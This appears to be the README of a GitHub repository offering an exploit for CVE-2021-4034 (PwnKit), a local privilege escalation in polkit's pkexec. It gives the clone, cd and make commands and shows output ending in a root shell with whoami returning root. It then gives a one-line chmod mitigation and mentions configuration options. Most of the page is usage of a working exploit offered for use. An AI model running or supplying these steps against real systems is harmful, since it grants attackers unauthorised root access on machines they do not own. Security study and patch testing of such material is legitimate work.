/CVE-2021-4034

An exploit for CVE-2021-4034 aka Pwnkit: Local Privilege Escalation in polkit's pkexec

Primary LanguageC

CVE-2021-4034 Exploit

Usage

$ git clone https://github.com/whokilleddb/CVE-2021-4034
$ cd CVE-2021-4034
$ make
[!] CVE-2021-4034 Exploit By whokilleddb
[!] Initializing Setup
[+] Setup Done :D
[!] Setting Root Privileges
[!] Launching Root Shell
# /bin/whoami
root

Rough Patch

# chmod 0755 `which pkexec`

Note: You can configure the options by playing around with include/config.h